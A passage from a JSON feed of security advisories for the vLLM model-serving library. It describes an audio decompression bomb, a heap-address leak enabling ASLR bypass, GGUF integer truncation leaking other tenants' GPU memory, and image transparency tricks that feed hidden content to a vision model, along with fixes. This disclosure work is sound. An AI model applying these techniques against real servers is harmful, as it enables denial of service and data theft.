0.18.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02YzRyLWZtaDMtN3JoOM4ABbGv/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12Zm03LTRoNDMtZ3A2bc4ABZOJ","url":"https://github.com/advisories/GHSA-vfm7-4h43-gp6m","title":"Duplicate Advisory: vLLM Vulnerable to Regular Expression Denial of Service","description":"### Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-j828-28rj-hfhp. This link is maintained to preserve external references.\n\n### Original Description\n\nvLLM versions \u003e= 0.6.3 and \u003c 0.9.0 contain multiple regular expression denial of service (ReDoS) vulnerabilities. Several regex patterns — in vllm/lora/utils.py, the phi4mini tool parser, and the OpenAI-compatible serving chat endpoint — are susceptible to catastrophic backtracking. An attacker submitting crafted input with nested or repeated structures can trigger severe CPU consumption and performance degradation, resulting in denial of service.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-20T21:31:21.000Z","withdrawn_at":"2026-09-11T15:45:34.000Z","classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-j828-28rj-hfhp","https://nvd.nist.gov/vuln/detail/CVE-2025-71379","https://www.vulncheck.com/advisories/vllm-regular-expression-denial-of-service-in-multiple-components","https://github.com/advisories/GHSA-vfm7-4h43-gp6m"],"source_kind":"github","identifiers":["GHSA-vfm7-4h43-gp6m"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-11T16:00:10.786Z","updated_at":"2026-09-23T10:00:20.973Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12Zm03LTRoNDMtZ3A2bc4ABZOJ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12Zm03LTRoNDMtZ3A2bc4ABZOJ","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003e= 0.6.3, \u003c 0.9.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12Zm03LTRoNDMtZ3A2bc4ABZOJ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03OGZwLWNmNGgtZzM2cM4ABZOF","url":"https://github.com/advisories/GHSA-78fp-cf4h-g36p","title":"Duplicate Advisory: vLLM introduced enhanced protection for CVE-2025-62164","description":"### Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-mcmc-2m55-j8jj. This link is maintained to preserve external references.\n\n### Original Description\n\nvLLM versions \u003e= 0.10.2 and \u003c 0.13.0 are missing sparse tensor validation in multimodal embeddings processing. Because PyTorch disables sparse tensor invariant checks by default, an attacker can submit crafted embedding requests with malformed (negative or out-of-bounds) tensor indices, when the prompt-embeds feature is enabled, to trigger crashes or resource exhaustion (denial of service), with potential for out-of-bounds/write-what-where memory corruption. This continues CVE-2025-62164, whose prior fix only disabled the feature by default rather than addressing the root cause.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-20T21:31:21.000Z","withdrawn_at":"2026-09-11T19:18:42.000Z","classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-mcmc-2m55-j8jj","https://nvd.nist.gov/vuln/detail/CVE-2026-56340","https://www.vulncheck.com/advisories/vllm-denial-of-service-via-unvalidated-multimodal-embeddings","https://access.redhat.com/security/cve/CVE-2026-56340","https://bugzilla.redhat.com/show_bug.cgi?id=2491060","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-56340.json","https://github.com/advisories/GHSA-78fp-cf4h-g36p"],"source_kind":"github","identifiers":["GHSA-78fp-cf4h-g36p"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-09-11T20:00:10.916Z","updated_at":"2026-09-23T10:00:20.972Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OGZwLWNmNGgtZzM2cM4ABZOF","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03OGZwLWNmNGgtZzM2cM4ABZOF","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.13.0","vulnerable_version_range":"\u003e= 0.10.2, \u003c 0.13.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OGZwLWNmNGgtZzM2cM4ABZOF/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14OHhyLW1qOXgtNmg3d84ABY-s","url":"https://github.com/advisories/GHSA-x8xr-mj9x-6h7w","title":"Duplicate Advisory: image EXIF Rotation \u0026 PNG tRNS Transparency Not Normalized, Causing Mismatch Between Model Input and Expectations","description":"## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-8jr5-v98p-w75m. This link is maintained to preserve external references.\n\n## Original Description\nA flaw was found in vLLM, an open-source library for large language model inference. This vulnerability arises from improper handling of image metadata, specifically EXIF orientation and PNG transparency (tRNS) data, during image processing. When images are converted to RGB, transparency information may be implicitly discarded or remapped, leading to unexpected rendering of transparent pixels and distortion of input content. This can result in the model misinterpreting image content, potentially affecting the integrity of processed data.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T18:35:47.000Z","withdrawn_at":"2026-06-18T14:31:36.000Z","classification":"GENERAL","cvss_score":4.8,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L","references":["https://nvd.nist.gov/vuln/detail/CVE-2026-12491","https://access.redhat.com/security/cve/CVE-2026-12491","https://bugzilla.redhat.com/show_bug.cgi?id=2489786","https://github.com/advisories/GHSA-x8xr-mj9x-6h7w"],"source_kind":"github","identifiers":["GHSA-x8xr-mj9x-6h7w"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-18T15:00:09.306Z","updated_at":"2026-09-23T10:02:08.276Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14OHhyLW1qOXgtNmg3d84ABY-s","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14OHhyLW1qOXgtNmg3d84ABY-s","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003e= 0.11.0, \u003c= 0.23.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14OHhyLW1qOXgtNmg3d84ABY-s/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02cHI5LXJwNTMtMnBtY84ABY4U","url":"https://github.com/advisories/GHSA-6pr9-rp53-2pmc","title":"vLLM: OOM Denial of Service via Audio Decompression Bomb","description":"### Summary\nvLLM's `/v1/audio/transcriptions` endpoint limits compressed upload size but not decoded PCM output. A 25MB OPUS file expands to ~14.9GB of float32 PCM at decode time. Tested on vLLM v0.19.0.\n\n### Details\n`SpeechToTextProcessor` rejects uploads over `VLLM_MAX_AUDIO_CLIP_FILESIZE_MB` (default 25MB) based on compressed byte length, but the audio decoder in `audio.py` accumulates all decoded frames into memory with no size limit before returning:\n\n```python\n# speech_to_text.py L184-189\nif len(audio_data) / 1024 ** 2 \u003e self.max_audio_filesize_mb:\n    raise VLLMValidationError(...)\ny, sr = load_audio(buf, sr=self.asr_config.sample_rate)  # decoded size unchecked\n\n# audio.py L77-107\nchunks: list[npt.NDArray] = []\nfor frame in container.decode(stream):\n    chunks.append(frame.to_ndarray())\naudio = np.concatenate(chunks, axis=-1).astype(np.float32)  # single contiguous allocation\n```\n\nA 25MB OPUS file at 6kbps encodes ~8.7 hours of audio. Decoding produces ~5.7GB of float32 PCM (232x amplification), and `np.concatenate` then allocates a second contiguous array, bringing peak RSS to ~14.9GB from a single request. `SpeechToTextConfig.max_audio_clip_s` (default 30s) applies only after the full decode and does not prevent the allocation.\n\n### Impact\nAn unauthenticated attacker can exhaust server memory with a small number of concurrent requests, each a valid upload within the documented size limit. Severity was assessed with reference to prior OOM vulnerability reports in vLLM.\n\n### Fix\n\nA fix for this vulnerability was merged here: https://github.com/vllm-project/vllm/pull/44970","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:06:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-6pr9-rp53-2pmc","https://github.com/vllm-project/vllm/pull/44970","https://github.com/vllm-project/vllm/commit/1b1359c33269446f13c05da9a90c25174cbea590","https://github.com/vllm-project/vllm/releases/tag/v0.23.1rc0","https://nvd.nist.gov/vuln/detail/CVE-2026-54233","https://github.com/advisories/GHSA-6pr9-rp53-2pmc","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-3404.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-6pr9-rp53-2pmc","CVE-2026-54233"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-25T12:01:52.462Z","epss_percentage":0.00422,"epss_percentile":0.33766,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cHI5LXJwNTMtMnBtY84ABY4U","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02cHI5LXJwNTMtMnBtY84ABY4U","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003c= 0.23.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cHI5LXJwNTMtMnBtY84ABY4U/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oZ2c4LWZxcWMtdmZtd84ABY4T","url":"https://github.com/advisories/GHSA-hgg8-fqqc-vfmw","title":"vLLM: incomplete CVE-2026-22778 fix leaks PIL repr addresses via Anthropic router","description":"# vLLM: incomplete CVE-2026-22778 fix leaks PIL repr addresses via the Anthropic API router\n\n**Researcher:** Kai Aizen — SnailSploit (@SnailSploit), Adversarial \u0026 Offensive Security Research\n**Severity:** CVSS 3.1 5.3 (Medium)  `AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`\n**Target:** https://github.com/vllm-project/vllm\n\n---\n\n## Summary\n\nThe fix for CVE-2026-22778 / GHSA-4r2x-xpjr-7cvv (PRs #31987 and #32319) introduced `sanitize_message` and applied it at four FastAPI exception-handling sites in the OpenAI router. The sanitizer strips object-repr memory addresses (`\u003c_io.BytesIO object at 0x7a95e299e750\u003e` → `\u003c_io.BytesIO object\u003e`) before error messages reach the client, defeating the ASLR-bypass primitive that CVE-2026-22778 chained with a libopenjp2 heap overflow for RCE.\n\nThe fix is incomplete: response paths added to vLLM at or after the same time as the fix continue to echo `str(exc)` directly to clients without `sanitize_message`. The original Stage 1 primitive — sending malformed image bytes so PIL raises `UnidentifiedImageError` whose message contains the BytesIO object repr — reaches all of them unmodified and leaks the heap address verbatim in the response body.\n\nAll five lines below are present in `main` HEAD (`771e1e48b`, 2026-05-26).\n\n## Affected sites\n\nCurrent `main` HEAD (`771e1e48b`, 2026-05-26):\n\n| # | File | Line | Code |\n|---|---|---|---|\n| 1 | `vllm/entrypoints/anthropic/api_router.py` | 78 | `message=str(e),` (inside `POST /v1/messages` exception handler) |\n| 2 | `vllm/entrypoints/anthropic/api_router.py` | 124 | `message=str(e),` (inside `POST /v1/messages/count_tokens`) |\n| 3 | `vllm/entrypoints/anthropic/serving.py` | 808 | `error=AnthropicError(type=\"internal_error\", message=str(e)),` (SSE streaming converter) |\n| 4 | `vllm/entrypoints/speech_to_text/realtime/connection.py` | 75 | `await self.send_error(str(e), \"processing_error\")` (WebSocket event loop) |\n| 5 | `vllm/entrypoints/speech_to_text/realtime/connection.py` | 265 | `await self.send_error(str(e), \"processing_error\")` (WebSocket generation loop) |\n\n## Why the global exception handler does not save these paths\n\n`api_server.py` registers a catch-all `app.exception_handler(Exception)(exception_handler)` at line 262, and that handler calls `create_error_response(exc)` which DOES apply `sanitize_message`. However, FastAPI exception handlers fire only on **unhandled** exceptions that propagate out of a route function.\n\nAll affected HTTP paths catch `Exception` *inside* the route coroutine and construct the response themselves:\n\n```python\n# vllm/entrypoints/anthropic/api_router.py:71-81 (POST /v1/messages)\ntry:\n    generator = await handler.create_messages(request, raw_request)\nexcept Exception as e:\n    logger.exception(\"Error in create_messages: %s\", e)\n    return JSONResponse(\n        status_code=HTTPStatus.INTERNAL_SERVER_ERROR.value,\n        content=AnthropicErrorResponse(\n            error=AnthropicError(\n                type=\"internal_error\",\n                message=str(e),       # \u003c-- unsanitized\n            )\n        ).model_dump(),\n    )\n```\n\nBecause the exception is caught and a `JSONResponse` is returned in-route, every registered FastAPI exception handler — including the sanitizing global one — is bypassed. The WebSocket path bypasses it for a different reason: WebSocket frames don't traverse FastAPI's HTTP exception handler chain at all.\n\n## Reachability — the same primitive as the parent CVE\n\nThe Anthropic Messages API accepts image content parts in the request body (`type: \"image\"` with base64 `source.data` or `type: \"image_url\"`). Image bytes are passed to the same multimodal loader used by the OpenAI router. Malformed bytes cause `PIL.Image.open` to raise:\n\n```\nUnidentifiedImageError: cannot identify image file \u003c_io.BytesIO object at 0x7a95e299e750\u003e\n```\n\nThe exception propagates up through `handler.create_messages` into the `except Exception as e:` at `api_router.py:75`. `str(e)` returns the exception message verbatim, including the address. The address ends up in the `error.message` field of the JSON response body returned to the attacker. ASLR entropy on the affected process drops from ~4 billion to ~8 candidates, identically to CVE-2026-22778 Stage 1.\n\nThe same primitive is reachable on `POST /v1/messages/count_tokens` (route #2), inside the SSE streaming converter when an exception is raised mid-stream (route #3), and over the realtime speech-to-text WebSocket when audio decoder or generation paths raise an exception containing any object repr (routes #4, #5).\n\n## Chronology — these are scope misses, not legacy code\n\n- **2026-01-09:** PR #31987 (`aa125ecf0`) introduces `sanitize_message` and applies it to OpenAI router HTTP exception handlers.\n- **2026-01-15** (six days later): PR #32369 (`4c1c501a7`) adds `vllm/entrypoints/anthropic/api_router.py` containing line 78's `message=str(e)`. The fix was not applied to the new router.\n- **2026-03-02** (~two months later): PR #35588 (`9a87b0578`) adds the Anthropic `count_tokens` endpoint, replicating the same `message=str(e)` pattern at line 124.\n- **2026-05-12** (~four months later): PR #42370 (`d37e25ffb`) consolidates speech-to-text entrypoints and the realtime WebSocket uses `send_error(str(e), ...)` for both error paths.\n- **2026-05-26:** current `main` HEAD, all five lines still present.\n\n## CVSS v3.1\n\n`AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` — Base 5.3 (MEDIUM)\n\nThe parent CVE-2026-22778 was 9.8 (CRITICAL) because it chained the Stage 1 leak with a Stage 2 libopenjp2 heap overflow. Stage 2 is patched in OpenCV ≥ 4.13.0 (PR #32668 bumped the requirement), so Stage 1 alone here is a partial ASLR-bypass info-disclosure primitive rather than a complete RCE. Deployments that ship vLLM alongside an older OpenCV/libopenjp2 (system OpenCV on long-LTS distros, custom Docker images, downstream rebuilds) re-enable the full chain via the affected endpoints.\n\n## CWE\n\nCWE-532 (Insertion of Sensitive Information into Log File / Error Message). Same CWE assigned to the parent CVE-2026-22778.\n\n## Remediation\n\n### 1. Apply `sanitize_message` symmetrically to the five sites\n\n```python\n# vllm/entrypoints/anthropic/api_router.py — add at top:\nfrom vllm.entrypoints.utils import sanitize_message\n\n# Line 78 (POST /v1/messages) and Line 124 (count_tokens):\nmessage=sanitize_message(str(e)),\n```\n\n```python\n# vllm/entrypoints/anthropic/serving.py — add at top:\nfrom vllm.entrypoints.utils import sanitize_message\n\n# Line 808:\nerror=AnthropicError(type=\"internal_error\", message=sanitize_message(str(e))),\n```\n\n```python\n# vllm/entrypoints/speech_to_text/realtime/connection.py — add at top:\nfrom vllm.entrypoints.utils import sanitize_message\n\n# Lines 75 and 265:\nawait self.send_error(sanitize_message(str(e)), \"processing_error\")\n```\n\n### 2. Tighten the regex (defense in depth)\n\nThe current regex `r\" at 0x[0-9a-f]+\u003e\"` is narrow — it only matches the exact CPython builtin object-repr suffix in lowercase hex with a trailing `\u003e`. Future Python versions, C extensions, or custom `__repr__` methods could produce non-matching formats that re-enable the leak:\n\n```python\n# vllm/entrypoints/utils.py\ndef sanitize_message(message: str) -\u003e str:\n    # Strip any standalone hex address; downstream observers don't need them.\n    return re.sub(r\"\\b0x[0-9a-fA-F]{6,}\\b\", \"0x?\", message)\n```\n\n### 3. Future-proofing: consider a response middleware\n\nBoth the route-local exception handling pattern (Anthropic router) and the WebSocket path bypass FastAPI's exception handler chain. A response-level middleware that always invokes `sanitize_message` on outgoing error bodies would prevent this class of regression entirely.\n\n## Affected versions\n\n- All vLLM versions containing `vllm/entrypoints/anthropic/api_router.py` (introduced 2026-01-15 in PR #32369).\n- All vLLM versions containing `vllm/entrypoints/speech_to_text/realtime/connection.py` (introduced 2026-05-12 in PR #42370).\n- Confirmed present in `main` HEAD `771e1e48b` (2026-05-26).\n\n## References\n\n- Parent advisory: https://github.com/vllm-project/vllm/security/advisories/GHSA-4r2x-xpjr-7cvv (CVE-2026-22778)\n- Fix PRs to model the patch on: #31987, #32319, #32668\n- `vllm/entrypoints/utils.py:sanitize_message`: https://github.com/vllm-project/vllm/blob/771e1e48b/vllm/entrypoints/utils.py#L323-L326\n- `vllm/entrypoints/anthropic/api_router.py` leak site: https://github.com/vllm-project/vllm/blob/771e1e48b/vllm/entrypoints/anthropic/api_router.py#L78\n\n## Steps to reproduce\n\n1. Clone the target: `git clone --depth 1 https://github.com/vllm-project/vllm`\n2. Run the proof of concept (`PoC.py`) against the cloned source.\n3. Observe the result shown under *Verified result* below.\n\n## Credit\n\nKai Aizen — SnailSploit (@SnailSploit). Adversarial \u0026 Offensive Security Research.\n\n## Fix\n\nA fix for this vulnerability was added here: https://github.com/vllm-project/vllm/pull/45119","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:04:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-hgg8-fqqc-vfmw","https://github.com/vllm-project/vllm/pull/45119","https://github.com/vllm-project/vllm/commit/94923629729381d7f7c9efde72071a2441f7fd82","https://nvd.nist.gov/vuln/detail/CVE-2026-54236","https://github.com/advisories/GHSA-hgg8-fqqc-vfmw","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-3408.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-hgg8-fqqc-vfmw","CVE-2026-54236"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-23T10:01:30.600Z","epss_percentage":0.00927,"epss_percentile":0.58991,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oZ2c4LWZxcWMtdmZtd84ABY4T","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oZ2c4LWZxcWMtdmZtd84ABY4T","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003c= 0.23.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oZ2c4LWZxcWMtdmZtd84ABY4T/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01anYyLWc1d3EtY21yNM4ABY4S","url":"https://github.com/advisories/GHSA-5jv2-g5wq-cmr4","title":"vLLM: GGUF dequantize kernel int truncation exposes uninitialized GPU memory in multi-tenant serving","description":"## Summary\n\nInteger truncation of tensor dimensions in vLLM's GGUF dequantize kernels (`csrc/quantization/gguf/gguf_kernel.cu`) causes partial tensor processing. The output tensor is allocated at full size via `torch::empty` (uninitialized memory), but the dequantize CUDA kernel processes only a truncated number of elements. The unfilled portion of the output tensor retains whatever was previously in GPU memory. In multi-tenant inference deployments, this residual GPU memory may contain tensor data from other users' inference requests, constituting information disclosure.\n\n## Root Cause\n\nThe `to_cuda_ggml_t` function pointer type at `ggml-common.h:1067` declares its element count parameter as `int` (32-bit):\n\n```cpp\nusing to_cuda_ggml_t = void (*)(const void * __restrict__ x,\n                                dst_t * __restrict__ y,\n                                int k,              // 32-bit\n                                cudaStream_t stream);\n```\n\nAll dequantize kernel functions (`dequantize_block_cuda`, `dequantize_row_q2_K_cuda`, etc. in `dequantize.cuh`) inherit this `int k` parameter and use it as the kernel launch grid size:\n\n```cpp\nstatic void dequantize_block_cuda(..., const int k, cudaStream_t stream) {\n    const int num_blocks = (k + 2*CUDA_DEQUANTIZE_BLOCK_SIZE - 1) / (2*CUDA_DEQUANTIZE_BLOCK_SIZE);\n    dequantize_block\u003c\u003c\u003cnum_blocks, CUDA_DEQUANTIZE_BLOCK_SIZE, 0, stream\u003e\u003e\u003e(vx, y, k);\n}\n```\n\nIn `ggml_dequantize()` at `gguf_kernel.cu:85`, the caller passes `m * n` (an `int64_t` product) to this `int k` parameter:\n\n```cpp\nat::Tensor DW = torch::empty({m, n}, options);    // line 80: full-size, UNINITIALIZED\n// ...\nto_cuda((void*)W.data_ptr(), (scalar_t*)DW.data_ptr(), m * n, stream);  // line 85: m*n truncated to int\n```\n\nWhen `m * n \u003e INT_MAX`, the truncated `k` is smaller than the actual tensor size. The kernel processes `k` elements. The remaining `(m * n) - k` elements in `DW` are never written and contain stale GPU memory.\n\nThis is a single root cause -- the `int` type on the `k` parameter in `to_cuda_ggml_t` -- with a single fix: change `int k` to `int64_t k`. All dequantize functions inherit this type through the same typedef.\n\n## Affected Functions\n\nAll in `csrc/quantization/gguf/gguf_kernel.cu`:\n\n| Function | Line | Allocation | Info Disclosure? |\n|----------|------|-----------|-----------------|\n| `ggml_dequantize` | 74 | `torch::empty({m, n})` at line 80 | Yes -- `m*n` truncated to `int k` at line 85 |\n| `ggml_mul_mat_vec_a8` | 91 | `torch::empty({vecs, row})` at line 99 | Yes -- `int col = X.sizes()[1]` at line 94 |\n| `ggml_mul_mat_a8` | 207 | `torch::empty({batch, row})` at line 215 | Yes -- `int col = X.sizes()[1]` at line 210 |\n| `ggml_moe_a8` | 279 | `torch::empty({tokens*top_k, row})` at line 289 | Yes -- `int col = X.sizes()[1]` at line 285 |\n\nAll four functions allocate output tensors with `torch::empty` (uninitialized) and then run CUDA kernels that use truncated dimension values as loop bounds. The unfilled portion of each output tensor retains stale GPU memory.\n\n`ggml_moe_a8_vec` (line 382) uses `torch::zeros` instead of `torch::empty`, so it is not affected by the info disclosure variant.\n\n## Impact: Information Disclosure in Multi-Tenant Serving\n\nvLLM is designed for multi-tenant inference serving. GPU memory is reused across requests from different users. When the dequantize kernel partially fills an output tensor:\n\n1. The output tensor `DW` is allocated with `torch::empty` -- the buffer contains whatever was previously in that GPU memory region\n2. The dequantize kernel fills only a truncated portion of the buffer\n3. The unfilled portion retains residual data from prior GPU operations, which may include tensor data from other users' inference requests\n4. The contaminated tensor proceeds through the model computation\n5. No error or warning is generated -- the partial fill is silent\n\nThis is a confidentiality violation. In shared inference deployments (the primary vLLM use case), one user's inference data can leak into another user's model computation through residual GPU memory.\n\n## Attacker Control\n\nThe attacker crafts a GGUF model file with weight tensor dimensions whose product exceeds `INT_MAX` (e.g., a matrix with shape `[65536, 65536]` gives `m * n = 4,294,967,296`). The model is hosted on HuggingFace or any model hub. The victim loads the model with vLLM for inference serving. The truncation happens automatically during model weight dequantization.\n\n## Fix\n\nA fix for this vulnerability was added here: https://github.com/vllm-project/vllm/pull/44971","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:03:11.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-5jv2-g5wq-cmr4","https://github.com/vllm-project/vllm/pull/44971","https://github.com/vllm-project/vllm/commit/f219788f91952827132fa4fdf916427cd20d225e","https://nvd.nist.gov/vuln/detail/CVE-2026-53923","https://github.com/advisories/GHSA-5jv2-g5wq-cmr4","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-3403.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-5jv2-g5wq-cmr4","CVE-2026-53923"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-10-04T01:01:34.998Z","epss_percentage":0.00484,"epss_percentile":0.39539,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01anYyLWc1d3EtY21yNM4ABY4S","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01anYyLWc1d3EtY21yNM4ABY4S","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.24.0","vulnerable_version_range":"\u003e= 0.5.5, \u003c 0.24.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01anYyLWc1d3EtY21yNM4ABY4S/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04anI1LXY5OHAtdzc1bc4ABY4R","url":"https://github.com/advisories/GHSA-8jr5-v98p-w75m","title":"vLLM: image EXIF Rotation \u0026 PNG tRNS Transparency Not Normalized, Causing Mismatch Between Model Input and Expectations","description":"## Summary\n\nIssue 1: EXIF orientation not normalized → The image orientation processed by the model differs from how humans view it, introducing interpretation bias.\n\nIssue 2: PNG tRNS not explicitly flattened before converting to RGB → After conversion, transparent/semi-transparent pixels are rendered unexpectedly, making otherwise subtle overlay elements visible and distorting the input content. (This attack is similar to AlphaDog: RGBA handling is already correct in vLLM, but since tRNS permits RGB images, the correct processing path isn’t taken.)\n\nIssue 3 : Pillow only loads the first frame when loading APNG or GIF files.\n\n---\n\n## Root Cause\n\n* **Rotation**: After opening an image, `ImageOps.exif_transpose` is not called to normalize EXIF orientation.\n* **Transparency**: Only **RGBA→RGB** is flattened with a background; PNGs carrying **`tRNS`** in **`P`/`L`/`RGB + tRNS`** and other non-RGBA modes take the `image.convert(\"RGB\")` path, which implicitly discards/remaps transparency semantics.\n\n---\n\n## Affected Code\n\n\nhttps://github.com/vllm-project/vllm/blob/16b37f3119918c1e5a39f303e0d0892c65c07a90/vllm/multimodal/image.py#L77-L84\n\nhttps://github.com/vllm-project/vllm/blob/16b37f3119918c1e5a39f303e0d0892c65c07a90/vllm/multimodal/image.py#L37-L43\n\nhttps://github.com/vllm-project/vllm/blob/16b37f3119918c1e5a39f303e0d0892c65c07a90/vllm/multimodal/image.py#L26-L34\n\u003e Current state: `ImageOps.exif_transpose` is not used. (Although the `rescale_image_size` function ([https://github.com/vllm-project/vllm/blob/main/vllm/multimodal/image.py#L14](https://github.com/vllm-project/vllm/blob/main/vllm/multimodal/image.py#L14)) exists and includes a `transpose` parameter, I’ve found that it doesn’t seem to be called anywhere outside the `test` directory.）\n\n\u003e **Call order**: `_convert_image_mode` runs first; if the conditions are met, `convert_image_mode` is called.\n\u003e \n\u003e **Issue**: Only the “RGBA → RGB” path is explicitly flattened. `P`, `L`, or `RGB` with `tRNS` all fall back to `image.convert(\"RGB\")`. For PNGs that include `tRNS`, `convert(\"RGB\")` directly produces 24-bit RGB, leading to:\n\u003e \n\u003e * **`P` mode**: The transparent index becomes an actual RGB color (often black, white, or an undefined background), so transparency is lost.\n\u003e * **`L/LA` and `RGB + tRNS`**: `convert(\"RGB\")` doesn’t composite against a chosen background first, so elements that relied on transparency to be hidden or softened become solid.\n\n\n## Impact \u0026 Scope\n\n* **Impact**: Pixels the model sees can diverge from operator expectations (due to orientation or transparency handling), potentially altering downstream reasoning.\n* **Scope**: The image I/O and mode-conversion paths in `vllm/multimodal/image.py`. The existing **RGBA→RGB** flattening is correct; the issues center on **missing EXIF normalization** and **non-RGBA `tRNS` not being explicitly composited**.\n\n## Case\nEXIF： http://qiniu.funxingzuo.top/exif_orient_180.jpg\ntRNS:  http://qiniu.funxingzuo.top/hello.png\n\n## Fix\n\nA fix for this vulnerability was merged here: 